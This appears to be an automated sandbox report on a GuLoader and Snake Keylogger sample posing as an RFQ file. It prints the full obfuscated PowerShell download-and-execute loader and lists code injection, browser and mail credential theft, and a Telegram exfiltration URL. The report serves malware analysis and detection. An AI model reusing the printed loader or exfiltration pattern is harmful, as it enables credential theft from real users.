Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00C1D6CC LdrInitializeThunk,LdrInitializeThunk, 6_2_00C1D6CC

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7620.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4190000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530594 Sample: #U8a62#U50f9 (RFQ) -RFQ2024... Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 api.telegram.org 2->25 27 5 other IPs or domains 2->27 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Yara detected GuLoader 2->43 49 5 other signatures 2->49 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 45 Tries to detect the country of the analysis system (by using the IP) 23->45 47 Uses the Telegram API (likely for C&C communication) 25->47 process4 signatures5 51 Early bird code injection technique detected 8->51 53 Writes to foreign memory regions 8->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 8->55 57 Queues an APC in another process (thread injection) 8->57 13 msiexec.exe 15 8 8->13         started        17 conhost.exe 8->17         started        59 VBScript performs obfuscated calls to suspicious functions 11->59 61 Suspicious powershell command line found 11->61 63 Wscript starts Powershell (via cmd or directly) 11->63 65 Suspicious execution chain found 11->65 19 powershell.exe 14 18 11->19         started        process6 dnsIp7 29 api.telegram.org 149.154.167.220, 443, 49995 TELEGRAMRU United Kingdom 13->29 31 reallyfreegeoip.org 188.114.97.3, 443, 49978, 49980 CLOUDFLARENETUS European Union 13->31 33 checkip.dyndns.com 132.226.8.169, 49975, 49981, 49983 UTMEMUS United States 13->33 67 Tries to steal Mail credentials (via file / registry access) 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 35 drive.usercontent.google.com 142.250.185.161, 443, 49747, 49974 GOOGLEUS United States 19->35 37 drive.google.com 142.250.186.142, 443, 49737, 49969 GOOGLEUS United States 19->37 71 Found suspicious powershell code related to unpacking or dynamic code loading 19->71 21 conhost.exe 19->21         started        signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
132.226.8.169
 checkip.dyndns.com United States
16989 UTMEMUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
142.250.185.161
 drive.usercontent.google.com United States
15169 GOOGLEUS false
142.250.186.142
 drive.google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
drive.google.com 142.250.186.142 true
drive.usercontent.google.com 142.250.185.161 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 132.226.8.169 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		unknown
    https://reallyfreegeoip.org/xml/8.46.123.33 false
    • URL Reputation: safe
    		 unknown
    http://checkip.dyndns.org/ false
    • URL Reputation: safe
    		 unknown